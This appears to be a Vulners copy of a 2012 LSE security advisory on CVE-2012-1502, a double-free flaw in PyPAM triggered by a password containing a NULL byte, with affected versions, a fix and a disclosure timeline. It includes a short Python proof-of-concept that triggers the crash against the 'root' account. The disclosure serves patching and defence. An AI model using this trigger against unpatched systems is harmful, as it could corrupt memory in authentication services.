Vulners
Lucene search
PyPAM 0.4.2 Double-Free Corruption
🗓️ 09 Mar 2012 00:00:00Reported by Markus VervierType 
packetstorm🔗 packetstormsecurity.com👁 48 Views
| Reporter | Title | Published | Views | Family All 34 |
|---|---|---|---|---|
 | PyPAM Python bindings for PAM Double Free Corruption | 10 Mar 201200:00 | – | zdt |
 | CVE-2012-1502 | 16 Jun 201200:00 | – | cve |
 | CVE-2012-1502 | 16 Jun 201200:00 | – | cvelist |
 | [SECURITY] [DSA 2430-1] python-pam security update | 10 Mar 201215:51 | – | debian |
 | CVE-2012-1502 | 16 Jun 201200:00 | – | debiancve |
 | Debian DSA-2430-1 : python-pam - double free | 12 Mar 201200:00 | – | nessus |
| GLSA-201507-09 : PyPAM: Arbitrary code execution | 10 Jul 201500:00 | – | nessus |
| openSUSE Security Update : python-pam (openSUSE-SU-2012:0487-1) | 13 Jun 201400:00 | – | nessus |
| RHEL 6 : pypam (Unpatched Vulnerability) | 3 Jun 202400:00 | – | nessus |
| SuSE 11.1 Security Update : python-pam (SAT Patch Number 6025) | 25 Jan 201300:00 | – | nessus |
10
`-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=== LSE Leading Security Experts - Security Advisory 2012-03-01 ===
PyPAM -- Python bindings for PAM - Double Free Corruption
- - ---------------------------------------------------------
Affected Versions
=================
PyPAM <= 0.4.2
Red Hat PyPAM <= 0.5.0-12
Debian python-pam <= 0.4.2-12.2
Ubuntu python-pam <= 0.4.2-12.2
SUSE python-pam <= 0.5.0-79.1.2
Gentoo pypam <= 0.5.0
Problem Overview
================
Technical Risk: high
Likelihood of Exploit: low to medium
Vendor: Rob Riggs, Various
Discovery: Markus Vervier
Advisory URL: http://www.lsexperts.de/advisories/lse-2012-03-01.txt
Advisory Status: Public
CVE-Number: CVE-2012-1502
Problem Description
===================
While conducting an internal test LSE discovered that by supplying
a password containing a NULL-byte to the PyPAM module, a double-free [1]
condition is triggered. This leads to undefined behaviour and may allow
remote code execution.
Temporary Workaround and Fix
============================
Filtering NULL-bytes in strings before passing them to the PyPAM module
will mitigate the exploit. Also current GLIBC protections may prevent
the double-free condition from being exploitable. It is advised to update
to a fixed version of PyPAM.
Detailed Description
====================
When PyArg_ParseTuple() in line 81 of PAMmodule.c is given a string with
Null-Bytes, a TypeError exception is raised [2]. The security problem
is in
line 82 of PAMmodule.c where free() is called on *resp, but *resp is not
set to NULL. On line 95 in libpam's v_prompt.c the _pam_drop macro calls
free on the response again unless (*resp == NULL), which leads to
undefined behaviour.
The following PoC script triggers the problem:
<--snip-->
#!/usr/bin/env python
##
## python-pam 0.4.2 double free PoC
##
## 2012 Leading Security Experts GmbH
## Markus Vervier
##
# -*- coding: utf-8 -*-
def verify_password(user, password):
import PAM
def pam_conv(auth, query_list, userData):
resp = []
resp.append( (password, 0))
return resp
res = -3
service = 'passwd'
auth = PAM.pam()
auth.start(service)
auth.set_item(PAM.PAM_USER, user)
auth.set_item(PAM.PAM_CONV, pam_conv)
try:
auth.authenticate()
auth.acct_mgmt()
except PAM.error, resp:
print 'Go away! (%s)' % resp
res = -1
except:
print 'Internal error'
res = -2
else:
print 'Good to go!'
res = 0
return res
print verify_password("root", "a\x00secret")
<--snip-->
History
=======
2012-03-02 Problem discovery during internal QA
2012-03-05 Original vendor and Debian maintainer contacted
2012-03-06 Public Patch released
2012-03-07 Various maintainers contacted
2012-03-07 CVE-2012-1502 assigned
2012-03-08 LSE learned in that this bug was previously discovered and
fixed in rPath Linux [3]
2012-03-08 Coordinated Advisory Release
References
==========
[1] http://cwe.mitre.org/data/definitions/415.html
[2] http://docs.python.org/release/1.5.2p2/ext/parseTuple.html
[3] https://issues.rpath.com/browse/RPL-2773
- - --
http://www.lsexperts.de
LSE Leading Security Experts GmbH, Postfach 100121, 64201 Darmstadt
Unternehmenssitz: Weiterstadt, Amtsgericht Darmstadt: HRB8649
Geschäftsführer: Oliver Michel, Sven Walther, Dr. Peter Schill
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEcBAEBAgAGBQJPWTGEAAoJEK9u9A5+VXgeidQH/ideiS6fiMUGSBMz51W42/+l
x0Qm/f2W6LV3NdEO5674wg07nFHju2LBYFHy1Ng5LyLPdIXO3q08DVG8h7vZJAdl
hKdegiwyA0ALqfv2uc4gT3kGm1GUxguGLg43z5c89lIsXV8p2ng+ZynLQ2yhcTQz
X32LyS+dcshdiTIYxgLJDAoSKn1ZiGd/tQ07kjzFG6EicP3+CxP1gjJDg6W16KvV
9Uk+7lHaNfUdqcZTwEhIQwxAE9dU51HK5d+/W6VaGfPdv1d1m6kdvb59kkEeBPcq
T930i0SsrpJrGYaNFy3Toebi+/yJzvcegdJmQWC6gvw2WJCZf8Fd1H5tU3LCO9E=
=MNYZ
- -----END PGP SIGNATURE-----
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEcBAEBAgAGBQJPWTG5AAoJEK9u9A5+VXgeS8AH/06N4JcJ0FXU4AZi2gPx8v9O
fM6C3K6f374Ta3/FmgURHouxBfDHEjypuerstGY+PNggpc2XakbQzGUromd1iQ1i
nIp3wPjVhFc906x3vJ/K3XO6Nyq5HgfEuCV0qIsLKiRxRFKWYxElgmpDznQoFPW/
HnNaqN/GozzD3ik3XHQZ6fCG3jGctaeJHC1MwJ33xrDdSPq9HyHM0hGDSWBlNZSE
hIgBFnK34qLuZfnAc5voV7FwzlIBaptcFmEjpbMglNJ1PJZ7NCBt4jydqoOPUvfe
15cg9xxXBnFDBefI7c0/PnoTs3pHHrB3Op257fRmz1DaX0e7ZnjpNb/Y54DBZ5I=
=draZ
-----END PGP SIGNATURE-----
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Mar 2012 00:00Current
0.1Low risk
Vulners AI Score0.1
EPSS0.25639